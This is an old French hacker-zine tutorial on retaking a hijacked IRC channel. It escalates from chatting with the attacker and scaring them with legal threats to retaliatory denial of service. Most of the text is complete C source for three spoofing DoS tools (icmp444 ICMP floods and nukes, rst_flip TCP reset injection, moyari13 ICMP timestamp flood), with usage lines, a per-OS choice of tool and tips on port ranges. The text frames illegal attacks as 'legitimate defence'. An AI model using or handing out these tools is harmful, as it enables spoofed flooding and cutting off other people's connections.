                 Reprendre son channel irc victime d'un TO By Lionel         
                 ___________________________________________________



1)Intro
-------

Ce texte est a un but de securit et d'education.Vous en avez marre que des mecs
vous fasse des "TO"(take over) sur vos channel irc!!! Now j'ai la solution
pour reprendre votre chan! 

2)Les methodes
--------------

Je vais les prendres dans l'ordre:
-Discuter avec le pirate born! /* la premiere chose a faire */
-S.E. /* dexime solution */
-DoS  /* dernire solution */
La vous vous dites , "legal le DoS , tu rigole!".Ben non moi j'appelle ca de
la legitime defense :o),biensur toujours tester les 2premieres methodes avant
c'est toujours mieux de s'arrenger  la miable!

3)Discuter avec un "idiot"
--------------------------

Bon cette methode marche 1 fois sur 1000 :o) , car y a pas beaucoups de pirate
intelligent.
Quesqui faut lui dire?
toi-Salut , pourquoi tu as fais ca?
idiot-Ben parce que ton channel c'est un grosse merde!
(garder son calme malgr les insultes :o)
toi-C'est  peut etre vrai , bon maintenent que tu as gagn re donne moi mon
channel s'il-te plait ....
(alors la 2reponses possible:)
a)idiot-Oui tous de suite ( ben la c'est un miracle!)
b)idiot-Tu reve sale boufon! (ca c'est la realite!)
Bon ben si la reponse est a ta gagn et si c'est b ben on passe au plan b :)
(j'ai toujours rev de dire ca ;)

4)Plan b (S.E.)
---------------

(S.E.=social engine)
Donc cette methode marche deja mieux 1chance sur 2 pour retrouver ton channel
:o) ...
La but est tres simple faire peur pour faire partir la crasse ...;)
exemple(imaginons que the idiot a fait un TO sur ton channel par des moyen
illegal,style DoS):
toi-Salut , t'aurrais jamais dut faire ca :)
idiot-Ou la la j'ai peur , maman!
toi-mouarf , tu vois ce que tu viens de faire est punit par la loi!
idiot- merde alors!
toi:je vais port plainte contre toi , tous de suite!
(alors la 2 reaction possible un signoff-idiot-(LEAVING) ou la reponse qui
suis:)
idiot- je m'en foue , de toute facon c'est un compte pirate :))))
toi: apparament vue que tu es idiot je t'explique un truc , quand tu te
connecte ton n de tel s'affiche chez le provider donc si je porte en plainte
en disant que en plus c'est un conte pirate tu vas avoir une bonne peine de
prison , on va pas te revoir avant quelque annes :)
(idiot alors la ou il se casse en courant ou il repond encore!)
idiot- Va y porte plainte je m'en foue!
Bon ou vous etes passient et vous continuez a lui faire peur (il est possible
aussi que vous portiez vraiment plainte abuse@provider.fr , et vous donnez les
logs des attaques + que c'est un abo pirate .....)
Bon si apres tous ca il veut toujours pas comprendre , l'artillerie lourde
s'impose!!!

5)The lgitime defense! (DoS)
-----------------------------

a)riposte
---------
Dans ce cas je considre ca comme de la legitime defence!
Bon deja il faut determiner l'os de l'agresseur!Bon j'espere que vous assez
malin pour savoir comment faire , vous avez le choix (/ver ou scan port ...).
A chaque OS different une riposte differente:
win3.1/95/98/NT (avec ou sans pc conseal firewall) & mac OS :
riposte: DESTROY(1234.c) ou ICMP444 ou RST_FLIP
win98/2000/NT? 
riposte: Kod , moyari13 ,... (ICMP ou IGMP type 13)
Linux kernel < ou = 2.0.33
riposte: TEARDROP, SYNDROP , OVERDROP , ICMP444 , RST_FLIP
Linux Kernel > 2.0.33 & UNIX systeme ***
riposte: ICMP444, RST_FLIP
Linux Kernel = 2.2.10
riposte: icmp444, RST_FLIP (il y aussi un DoS contre se kernel qui viens de
sortir). 

b)codes expliquations
---------------------
Destroy: est un compilation  de DoS (1234.c , smurf , teardrop ....)
-------
ICMP444: c'est un code fait par cod4(hotcode)(noroute) qui exploit l'icmp a
-------
plusieur but.
RST_FLIP: c'est un code qui envoie un FLAG reset a une connexionen cours:
--------
A:serveur
B:agresseur
C:vous (risposte)
A-----conexion-------B
A et B sont connects
A------|-------B
C-------
C envoie d'un flag RST avec host src "A"
A---|||------B
connexion entre A et B coup
Kod,moyari13,...: ces codes envoies un packet ICMP ou IGMP de type 13.
----------------
TEARDROP, SYNDROP , OVERDROP: ces codes envoies des packets UDP ...
-----------------------------
Bon c'etais juste de l'informations pour vos petite cervelle ;)

c)codes
-------
Destroy:
======== 
voir dans le mag package: came.tar
/* EOF */

ICMP444:
========
/* 
 * icmp444.c  ver 0.3  pareil ke la ver 0.2 mais avec 
 un nuker integrer :)   
devil~#  icmp444c E www.nasa.gov ip_of_sucker  size_of_echo 
for  overload a machine:  
devil~# icmp444 O  www.nasa.gov www.fbi.gov  ip_of_sucker 
ok it's all :)   
CoD4 #phe  boor@hotmail.com 
greetz giemor pirus mikasoft  
 
*/ 
 
#define IPHDRSIZE sizeof(struct iphdr) 
#define ICMPHDRSIZE sizeof(struct icmphdr) 
 
 
#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <signal.h> 
#include <fcntl.h> 
#include <syslog.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <sys/wait.h> 
#include <sys/ioctl.h> 
#include <sys/stat.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#include <linux/ip.h> 
#include <linux/icmp.h> 
#include <linux/tcp.h> 
#include <linux/udp.h> 
#include <netinet/ip_icmp.h> 
 
#ifdef SYSV 
#define bcopy(s1,s2,len) memcpy(s2,s1,len) 
#endif 
 
 
 /*   fonction rippe'e  ki sert a calculer les cheksums  */ 
 
/* 
 * in_cksum -- 
 *  Checksum routine for Internet Protocol family headers (C Version) 
 */ 
unsigned short in_cksum(addr, len) 
    u_short *addr; 
    int len; 
{ 
    register int nleft = len; 
    register u_short *w = addr; 
    register int sum = 0; 
    u_short answer = 0; 
  
    /* 
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add 
     * sequential 16 bit words to it, and at the end, fold back all the 
     * carry bits from the top 16 bits into the lower 16 bits. 
     */ 
    while (nleft > 1)  { 
        sum += *w++; 
        nleft -= 2; 
    } 
  
    /* mop up an odd byte, if necessary */ 
    if (nleft == 1) { 
        *(u_char *)(&answer) = *(u_char *)w ; 
        sum += answer; 
    } 
  
    /* add back carry outs from top 16 bits to low 16 bits */ 
    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ 
    sum += (sum >> 16);         /* add carry */ 
    answer = ~sum;              /* truncate to 16 bits */ 
    return(answer); 
} 
 
/* autre fonction ripe'e ki sert a convertir les noms en ip */ 
 
unsigned int host2ip(char *serv) 
{ 
   struct sockaddr_in sin; 
   struct hostent *hent; 
       
   hent = gethostbyname(serv); 
   if(hent == NULL) return 0; 
   bzero( (char *)&sin, sizeof(sin) ); 
   bcopy(hent->h_addr, (char *)&sin.sin_addr, hent->h_length); 
   return sin.sin_addr.s_addr; 
} 
 
/* on attakons the kOd */ 
                     
main(int argc, char **argv) 
{ 
   struct sockaddr_in sin_dst; 
   unsigned char packet[4098]; 
   struct iphdr   *ip; 
   struct icmphdr *icmp; 
   struct iphdr   *ipfake; 
   unsigned char  *data; 
    
   unsigned           s_port; 
   unsigned           t_port; 
                                
   int s; 
   int i; 
   int DATA; 
   int s_portinc,t_portinc; 
    
   ip = (struct iphdr *)packet; 
   icmp = (struct icmphdr *)(packet+IPHDRSIZE); 
   ipfake = (struct iphdr*)(packet+IPHDRSIZE+ICMPHDRSIZE ); 
   data = (char *)(packet+IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE); 
    
   memset(packet, 0, 4098); 
    
   printf(" ICMP444 ready for action ! CoD4 #PhE\n\n"); 
    
   if(argc == 1) { 
    
      printf(" for make a flood echo spoofing \n"); 
      printf(" icmp444 E <spoof adresse> <ip of victim> <size of paket>\n"); 
      printf(" ~#icmp444 E www.nasa.gov  ppp123.sucker.com 1000\n\n"); 
      printf(" for the overload the machine \n"); 
      printf("icmp444 O <spoof ip one > <spoof ip two > <ip of victim>\n"); 
      printf("~icmp444 0 www.nasa.gov www.fbi.gov ppp42.sucker.com \n\n"); 
      printf("NUKE !!!\n\n"); 
      printf("  generic nuke (icmp to the serveur)\n\n"); 
      printf("icmp444 X <destination op paket > <port source > <ip of source> <port of destination++;> <code of icmp (like 2 ) > \n"); 
 
      printf("~#icmp444 X irc.devil.com 6667 ppp45.sucker.com 1020 2 \n\n"); 
      printf("for nuke a man on unix or win 95 & NT (is cool for the bot ;)) \n "); 
      printf("icmp444 X <destination op paket > <port source++; > <ip of source> <port of destination> <use 2 ;)> \n");  
      printf("icmp444 N  ppp56.sucker.com 1020 irc.devil.com 6667 2 \n\n"); 
      printf(" voila :)\n\n CoD4  boor@hotmail.com\n");    
      exit(0); 
   } 
    
   /* ziva ke je t'ouvre une raw-chaussette */ 
    
   s = socket(AF_INET, SOCK_RAW, 255); 
   if (s < 0) 
   { 
      fprintf(stderr, "cant open raw socket\n"); 
      exit(0); 
   } 
    
      /*  bha je sais comment expliker ca mais disons ke c pour dire  
          au reseau kon va faire nos propre tit pakete ( mais vraiment  
          gros ) */ 
 
#ifdef IP_HDRINCL 
   if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i)) < 0) 
   { 
      fprintf(stderr, "cant set IP_HDRINCL\n"); 
      close(s); 
      exit(0); 
   } 
#endif 
    
        /* la on aorde le ECHO flood SPOOF */ 
 
   if ( argv[1][0]=='E') 
   { 
 
      DATA = atoi(argv[4]);  /* la taille du data */ 
 
      /* on mais dans l'en tete IP nos adresse de soure et destination */ 
 
      ip->saddr    = host2ip(argv[2]);  /* la spoof adresse */ 
      ip->daddr    = host2ip(argv[3]); 
      ip->version  = 4; 
      ip->ihl      = 5;  
      ip->ttl      = 255; 
      ip->protocol = 1;  
      ip->tot_len  = htons(IPHDRSIZE +ICMPHDRSIZE+DATA); /* taille */ 
 
      ip->tos      = 0; 
      ip->id       = 0; 
      ip->frag_off = 0; 
      ip->check    = in_cksum(packet,IPHDRSIZE);  /* cheksum du pakeip */ 
 
      icmp->type = 8;   /* type et code de l'eche reply */  
      icmp->code = 0; 
      icmp->checksum = in_cksum(icmp,ICMPHDRSIZE+DATA);  
      /* cheksum du paket icmp faut pas oubier DATA nan plus          */ 
      /* comme la fonction sendto a besoin de certain truc            */ 
      /* vi faut remplire la struct sockaddr  mais bon c pas terrible */ 
      sin_dst.sin_addr.s_addr = ip->daddr; 
      sin_dst.sin_family = AF_INET;  
      printf(" HEY ! %s u r dead  \n",argv[3] ); 
      for(;;){ 
         sendto( s,packet,IPHDRSIZE+ICMPHDRSIZE+DATA,0, 
             (struct sockaddr *)&sin_dst,sizeof(struct sockaddr) ); 
      } 
   } 
/* Hop la une tite  boucle ki envoye au mec de jolie tit echo requeste  
 spoofer mouhahahaha si il manke des 'B" c ke mon B deconne grave     */ 
/* l'option overload le truc est tres simple c de faire une erreur de  
 chsksum  */ 
 
   if ( argv[1][0]=='O' ) 
   { 
     unsigned int IP1; 
     unsigned int IP2; 
      
     /* on se la joue classique */ 
      
     IP1 = host2ip( argv[2] );  
     IP2 = host2ip( argv[3] );    
     ip->daddr    =  host2ip( argv[4] );                   
     ip->version  = 4; 
     ip->ihl      = 5; 
     ip->ttl      = 255; 
     ip->protocol = 1; 
     ip->tot_len  = htons( IPHDRSIZE +ICMPHDRSIZE ); 
     ip->id       = 2; 
     ip->frag_off = 0; 
     ip->tos      = 0;  
     ip->check    = in_cksum(packet,IPHDRSIZE);      
/* on mais le type et le code kon veut on s'en balance sec */ 
     icmp->type = 3; 
     icmp->code = 5; 
     icmp->checksum = 1234; /* la on voit le beau cheksum :))) */ 
 
     printf(" HEY ! %s  humm U have a 8086 ???  \n",argv[4] );                                            
   
     for(;;) 
     { 
       ip->saddr = IP1; 
       sin_dst.sin_addr.s_addr = ip->daddr; 
       sin_dst.sin_family = AF_INET; 
       sendto( s,packet,IPHDRSIZE+ICMPHDRSIZE,0, 
           (struct sockaddr *)&sin_dst,sizeof(struct sockaddr) ); 
       ip->saddr = IP2; 
       sin_dst.sin_addr.s_addr = ip->daddr; 
       sendto( s,packet,IPHDRSIZE+ICMPHDRSIZE,0, 
          (struct sockaddr *)&sin_dst,sizeof(struct sockaddr) ); 
     }                
  } 
   /* re tite  boucle de fou :)) */  
/* heheh des GOTO =) je sais ca fait pas serieux mais hin je fais pas 
 demomaker moi je cree ca marche BASTA ! nan mais de toute celui 
 k pas d'accord je le nuke a vie !                             */ 
 
   if( argv[1][0]=='X' ) 
   {  
      s_portinc=0; 
      t_portinc=1; 
      goto go; 
   }  
   if ( argv[1][0]=='N' ) 
   { 
      s_portinc=1; 
      t_portinc=0; 
go:  
/* pour la nuke pas de secret  c le meme en tete ip */  
   ip->saddr    = host2ip( argv[4] ); 
   ip->daddr    = host2ip( argv[2] ); 
   s_port=atoi( argv[3] ); 
   t_port=atoi( argv[5] );                                 
   ip->version  = 4; 
   ip->ihl      = 5; 
   ip->ttl      = 255; 
   ip->protocol = 1; 
   ip->tot_len  = htons( IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8 ); 
   ip->tos      = 0; 
   ip->id       = 2; 
   ip->frag_off = 0; 
   ip->check    = in_cksum( packet, IPHDRSIZE );                                                                                                   
   /* toujours le type 3 ! le code c comme vous voulez */                                                                                                   
   icmp->type = 3; 
   icmp->code = atoi( argv[6] ); 
   /* on commence a creer ce soit disant datagramme ki aurait causer l'erreure */ 
   /* la vous voyez c le datagramme kon va renvoyer avec l'icmp piger         */ 
   ipfake->saddr = ip->daddr;  
   ipfake->daddr = ip->saddr; 
   ipfake->version  = 4; 
   ipfake->ihl      = 5; 
   ipfake->ttl      = 255; 
   ipfake->protocol = IPPROTO_TCP; 
   ipfake->tot_len  = htons(IPHDRSIZE+36); 
   ipfake->tos      = 0; 
   ipfake->id       = 22; 
   ipfake->frag_off = 0; 
   ipfake->check    = in_cksum(ipfake,IPHDRSIZE); 
   for(;;) 
   { 
/* la on cree l'en tete tcp   */ 
/* on mais le port source etc */ 
      *( (unsigned int *)data )          = htons(s_port);  
      *( (unsigned int *)(data+2) )      = htons(t_port); 
      *( (unsigned long *)(data+4) )     = 6580; 
/* SURTOUT oulier pas de remetre a 0 le cheksum avant de le calculer !!*/ 
      icmp->checksum=0; 
      icmp->checksum = in_cksum(icmp,36); 
/* toujours pareil nos sales struct a remplir */ 
      sin_dst.sin_addr.s_addr = ip->daddr; 
      sin_dst.sin_family = AF_INET;                      
      sendto( s,packet,IPHDRSIZE+36,0, 
       (struct sockaddr *)&sin_dst,sizeof(struct sockaddr) );  
      printf( "sport,tport:%i,%i\n\n",s_port,t_port ); 
      s_port = s_port+s_portinc; 
      t_port = t_port+t_portinc;                                     
      usleep(200); 
   } 
 } 
} 
---EOF---
Ce code est dans son article sur la programmation "Icmp" (noroute3), ma
reference ...
RST_Flip:
=========
/*
rst_flip  1998(C) 	krypt@enteract.com - http://www.rootshell.com/	
This is a DOS attack against an existing connection where one of the hosts
is a Linux, SunOS, FreeBSD and possibly others. I did not have time to test
this code thoroughly.It's purpose is merely to illustrate that it is
possible to cause a conenction to be dropped by sending a couple of
customized packets to one of the hosts.	
The usage is quite simple:	
rst_flip <A> <B> <A port low> <A port hi> <B port low> <B port hi>
where A  and B are the hosts currently having a session and you do not want
them to.
To check if your hosts are vulnerable you can use scenario like this: Say
host A (Windows 10.10.3.21) is connected to port 21 of host B (SunOS -
10.10.1.23).  Since it is usually unknown what port A has utilized for this
connection ( it is higher than 1024,most of the time :) we have to consider
the possible range. So you would do:		
	rst_flip 10.10.3.21  10.10.1.23  1024  2000   21  21	
I am in no way responsible for whatever happens after this point. Do not
laugh at the code because i already know that. I'll work on it later. It
compiles on Linux.		
	cc -o rst_flip rst_flip.c			
Mad thanks to: 		tootin.
Greets to:		l0ck. 		
*/
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#define TCPHDR   sizeof(struct tcphdr)   	
#define IPHDR    sizeof(struct iphdr)    	
#define PACKETSIZE  TCPHDR + IPHDR
#define SLEEPTIME 30000			 	// 	depending on how fast can you barf the packets out
#define LO_RST  1				//
#define HI_RST  2147483647			// 	do not ask me about this :)
#define ERROR_FAILURE -1
#define ERROR_SUCCESS 0
void resolve_address(struct sockaddr *, char *, u_short);    
unsigned short in_cksum(unsigned short *,int );
int send_rst(char *, char *, u_short ,u_short , u_long, u_long,u_long);
int main(int argc, char *argv[])
{
    int res,i,j;
    int spoof_port,target_port;

    	if (argc < 7 || argc> 8 )	
    	{
		printf ("usage:  <source> <destination> <source_port_hi> <source_port_lo> <dest_port_hi> <dest_port_lo>\n[ http://www.rootshell.com/ ]\n");
		exit(ERROR_FAILURE);
	}
	
	for (i = atoi(argv[3]);i <= atoi(argv[4]); i++)
	{
		spoof_port = i;		

		for (j = atoi(argv[5]);j <= atoi(argv[6]); j++)
		{
    			target_port = j;
			printf("%s : %d \t", argv[1],spoof_port);
			printf("-> %s  :%d\n",argv[2], target_port);
			res=send_rst(argv[1],argv[2],spoof_port,target_port, HI_RST, HI_RST, 2);
			usleep(SLEEPTIME);
			res=send_rst(argv[1],argv[2],spoof_port,target_port, LO_RST,LO_RST, 2);
			usleep(SLEEPTIME);	
		}

    	}	
	return ERROR_SUCCESS;
}
// here we put it together 
int send_rst(char *fromhost, char *tohost, u_short fromport,u_short toport, u_long ack_sq, u_long s_seq, u_long spoof_id) 
{
    int i_result;
    int raw_sock;			
    static struct sockaddr_in local_sin, remote_sin; 
    struct tpack{                  
            struct iphdr ip;        
            struct tcphdr tcp;
    }tpack;                   
    struct pseudo_header{           				// pseudo header 4 the checksum 
            unsigned source_address;
            unsigned dest_address;
            unsigned char placeholder;
            unsigned char protocol;
            unsigned short tcp_length;
            struct tcphdr tcp;
    }pheader;
resolve_address((struct sockaddr *)&local_sin, fromhost, fromport);
resolve_address((struct sockaddr *)&remote_sin, tohost, toport);
	// TCP header
	tpack.tcp.source=htons(fromport);  			// 16-bit Source port number 
        tpack.tcp.dest=htons(toport);				// 16-bit Destination port 
	tpack.tcp.seq=ntohl(s_seq);				// 32-bit Sequence Number */
	tpack.tcp.ack_seq=ntohl(ack_sq);			// 32-bit Acknowledgement Number */
        tpack.tcp.doff=5;					// Data offset */
        tpack.tcp.res1=0;					// reserved */
        tpack.tcp.res2=0;					// reserved */
        tpack.tcp.urg=0;					// Urgent offset valid flag */
        tpack.tcp.ack=1;					// Acknowledgement field valid flag */
        tpack.tcp.psh=0;					// Push flag */
        tpack.tcp.rst=1;					// Reset flag */
        tpack.tcp.syn=0;					// Synchronize sequence numbers flag */
        tpack.tcp.fin=0;					// Finish sending flag */
        tpack.tcp.window=0;					// 16-bit Window size */
        tpack.tcp.check=0;					// 16-bit checksum (to be filled in below) */
        tpack.tcp.urg_ptr=0;					// 16-bit urgent offset */
	//  IP header 
	tpack.ip.version=4;             			// 4-bit Version */
        tpack.ip.ihl=5;                				// 4-bit Header Length */
        tpack.ip.tos=0;                 			// 8-bit Type of service */
        tpack.ip.tot_len=htons(IPHDR+TCPHDR);  			// 16-bit Total length */
        tpack.ip.id=htons(spoof_id);    			// 16-bit ID field */
        tpack.ip.frag_off=0;            			// 13-bit Fragment offset */
        tpack.ip.ttl=64;                			// 8-bit Time To Live */
        tpack.ip.protocol=IPPROTO_TCP;  			// 8-bit Protocol */
        tpack.ip.check=0;               			// 16-bit Header checksum (filled in below) */
        tpack.ip.saddr=local_sin.sin_addr.s_addr;  		// 32-bit Source Address */
        tpack.ip.daddr=remote_sin.sin_addr.s_addr; 		// 32-bit Destination Address */
        // IP header checksum  
	tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);       
	// TCP header checksum 
	pheader.source_address=(unsigned)tpack.ip.saddr;
        pheader.dest_address=(unsigned)tpack.ip.daddr;
        pheader.placeholder=0;
        pheader.protocol=IPPROTO_TCP;
        pheader.tcp_length=htons(TCPHDR);
	bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR);
	tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12);
	// Get a socket and send the thing
	raw_sock = socket(AF_INET, SOCK_RAW, 255);
        if (raw_sock==-1)     
	{  
		perror("can't open a raw socket.");
		exit(ERROR_FAILURE);
        		}
	i_result = sendto(raw_sock,&tpack,PACKETSIZE,0,(struct sockaddr *)&remote_sin,sizeof(remote_sin));
	if (i_result != PACKETSIZE) 
		perror("error sending packet");  
	close(raw_sock);		
}
// this is stolen :)
unsigned short in_cksum(unsigned short *ptr,int nbytes) {                  
    register long           sum;            // assumes long == 32 bits 
    u_short                 oddbyte;
    register u_short        answer;         // assumes u_short == 16 bits                  
        sum = 0;
        while (nbytes > 1)  {
                sum += *ptr++;
                nbytes -= 2;    
        }              
        if (nbytes == 1) {
                oddbyte = 0;           			 // make sure top half is zero 
                *((u_char *) &oddbyte) = *(u_char *)ptr; // one byte only 
                sum += oddbyte;
        }               
        sum  = (sum >> 16) + (sum & 0xffff);    // add high-16 to low-16 
        sum += (sum >> 16);                     // add carry 
        answer = ~sum;				// ones-complement, then truncate to 16 bits 
        return(answer);
}
//   Resolve the address and populate the sin structs
void resolve_address(struct sockaddr * addr, char *hostname, u_short port) 
{
   struct  sockaddr_in *address;
   struct  hostent     *host;
   	address = (struct sockaddr_in *)addr;
   	(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
   	address->sin_family = AF_INET;
   	address->sin_port = htons(port);
   	address->sin_addr.s_addr = inet_addr(hostname);
   	if ((int)address->sin_addr.s_addr == -1) {
        	host = gethostbyname(hostname);
        	if (host) {
                	bcopy( host->h_addr, (char *)&address->sin_addr,host->h_length);
                	}
        	else {
                	puts("Couldn't resolve the address!!!");
                	exit(ERROR_FAILURE);
        	}
   	}
}
---EOF---

moyari13:
=========
/* moyari13.c   by R00t Zer0( defcon0@ugtop.com) */
/* Windows 98's TCP/IP stack chokes on ICMP-Type13( timestamp request) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#define __FAVOR_BSD
#include <netinet/tcp.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>
#define IP_SIZE         sizeof( struct iphdr )
u_short
in_cksum( u_short *addr, int len )
    {
    int     nleft   = len;
    u_short *w      = addr;
    int     sum     = 0;
    u_short answer  = 0;

    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while( nleft > 1 )
        {
        sum += *w++;
        nleft -= 2;
        }
    /* mop up an odd byte, if necessary */
    if (nleft == 1)
        {
        *( u_char *)( &answer ) = *( u_char *)w;
        sum += answer;
        }
    /* add back carry outs from top 16 bits to low 16 bits */
    sum  = ( sum >> 16 ) + ( sum & 0xffff );    /* add hi 16 to low 16 */
    sum += ( sum >> 16 );                       /* add carry           */
    answer = ~sum;                              /* truncate to 16 bits */
    return( answer );
    }
int
send_icmp_packet( int sock_send, u_long src_addr, u_long dst_addr )
    {
    char    *packet, *cksum;        /* packet, cksum    */
    int     send_status, loop;
    struct  iphdr       *ip;        /* ip header        */
    struct  icmp        *icp;       /* icmp header      */
    struct  sockaddr_in from;       /* sockaddr         */
    struct  sockaddr_in to;         /* sockaddr         */
    /************************************/
    /* get and init packet_memory_area  */
    /************************************/
    packet  = ( char *)malloc( IP_SIZE + 20 );
    ip      = ( struct iphdr *)( packet );
    icp     = ( struct  icmp *)( packet + IP_SIZE );
    memset( packet, 0, IP_SIZE + 20 );
    /****************/
    /* IP header    */
    /****************/
    ip->saddr       = src_addr;
    ip->daddr       = dst_addr;
    ip->version     = 4;
    ip->ihl         = IP_SIZE / 4;
    ip->ttl         = 255;
    ip->protocol    = IPPROTO_ICMP;
    ip->id          = 0x01;
    ip->tot_len     = htons( IP_SIZE + 20 );
    ip->check       = in_cksum( (u_short *)ip, IP_SIZE );
    /****************/
    /*  ICMP header */
    /****************/
    icp->icmp_type  = 13;
    icp->icmp_code  = 0;
    icp->icmp_cksum = 0;
    /************************************/
    /* ICMP_id, ICMP_sequence = 0xffff  */
    /************************************/
    for( loop = IP_SIZE + 4; loop < IP_SIZE + 4 + 4; loop++ )
        *( packet + loop ) = 0xff;
    /********************************************************/
    /* ICMP_type13_otime/rtime/ttime = rand() % 0xffffffff  */
    /********************************************************/
    for( loop = IP_SIZE + 4 + 4; loop < IP_SIZE + 4 + 4 + 12; loop++ )
        *( packet + loop ) = rand() % 0xff;
    /************************/
    /* set ICMP_checksum    */
    /************************/
    icp->icmp_cksum = in_cksum( ( u_short *)( packet + IP_SIZE ),
                                4 + 16 );
    /********************/
    /* send 1 packets   */
    /********************/
    bzero( (char *)&to, sizeof( to ) );
    to.sin_family           = AF_INET;
    to.sin_addr.s_addr      = ip->daddr;
    send_status = sendto( sock_send, packet, IP_SIZE + 20, 0,
                          ( struct sockaddr *)&to, sizeof( struct sockaddr ) );
    free( packet );
    return( send_status );
    }
int
main( int argc, char *argv[] )
    {
    char    tmp_buffer[ 1024 ];         /* tmp_buffer                   */
    int     loop, loop2;                /* loop counter                 */
    int     sock_send;                  /* socket_fd                    */
    u_long  src_addr, dst_addr;         /* src/dst addr                 */
    time_t  t;                          /* init_rand_seed(time)         */

    struct  hostent     *host;          /* hostinfo(hostent)            */
    struct  sockaddr_in addr;           /* (sockaddr_in)addr            */
    /************************/
    /*  print usage(error)  */
    /************************/
    if( argc != 3 )
        {
        printf( "Usage : %s <dst addr> <count>\n", argv[0] );
        exit( -1 );
        }
    /********************/
    /*  init rand_seed  */
    /********************/
    t = time( 0 );
    srand( ( u_int )t );
    /********************/
    /* Get src_address  */
    /********************/
    gethostname( tmp_buffer, 128 );
    host = gethostbyname( tmp_buffer );
    if( host == NULL )
        {
        printf( "Can't get this machine's hostname\n" );
        exit( -1 );
        }
    memcpy( &src_addr, host->h_addr, 4 );
    /********************/
    /* Get dst_address  */
    /********************/
    memset( &addr, 0, sizeof( struct sockaddr_in ) );
    addr.sin_family         = AF_INET;
    addr.sin_addr.s_addr    = inet_addr( argv[1] );
    if( addr.sin_addr.s_addr == -1 )
        {
        host = gethostbyname( argv[1] );
        if( host == NULL )
            {
            printf( "Unknown host %s.\n", argv[1] );
            exit( -1 );
            }
        addr.sin_family = host->h_addrtype;
        memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length );
        }
    memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 );
    /********************/
    /* open RAW_socket  */
    /********************/
    if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1)
        {
        perror( "Getting raw send socket" );
        exit( -1 );
        }
#if 0   /* fake */
    src_addr = inet_addr( "89.89.89.89" );
#endif
    /****************************/
    /*  - m o - y a - r i -     */
    /****************************/
    printf( "[ moyari13 ( TimeStump request) Attack ]\n\n" );
    printf( "sending..." );
    for( loop = 0; loop < atoi( argv[2] ); loop++ )
        {
#if 1   /* spoof( random ) */
        src_addr = rand() % 0xffffffff;
#endif
        send_icmp_packet( sock_send, src_addr, dst_addr );
        printf( "." );
        fflush( stdout );
        }
    printf( "\nDone.\n" );
    close( sock_send );
    exit( 0 );
    }
---EOF---
Bien sur ces codes son a utilis en cas de lgitime defense!!!

d)probleme de rst_flip
----------------------
Ce code marche 1 coups sur 2.J'ai remarqu que le lancer sur une personne
arrivante et qui n'est pas encore parl , ca le deconnecte , mais si cette
personne a deja fait des actions le code se rvele inutile.Je pensse que se
probleme viens que les n de sequence change ou un truc comme ca et donc il
donne de mauvais parametres et le packet devient null. 
e)ICMP444
Marche tres bien a condition que l'agresseur n'est pas mis de filtrage sur les
packets icmp.
f)Les ports source
------------------
port source win: entre 1024/2000 la plus part du temps
port source unix: entre 1024/10000 environ mais defois c'est plus...

6)Conculsion
------------

N'oubli jamais que le DoS est illegal...

5) Greetz
---------

To: clemm, spoty , ank , k-roleen, shado, cod4&hotcode(big boss ;), klog,
rockme, XSFX, 3d13, organiks,[fred], torcy&marcx dormoy&18eme (Ali k.,
Xav,Olivier,Mathieux,Mmet,Arnauld,Camel,...),cantepeau(sophie,ced,youness,
seb,la shente,bouboule,ouadgerie, ...), toulouse(Gui.,florian,Lionel,JM,Dav,
Vincent,Bruno,yohan,seb,cyril,damien,...).......Et tous ce que j'oublie...




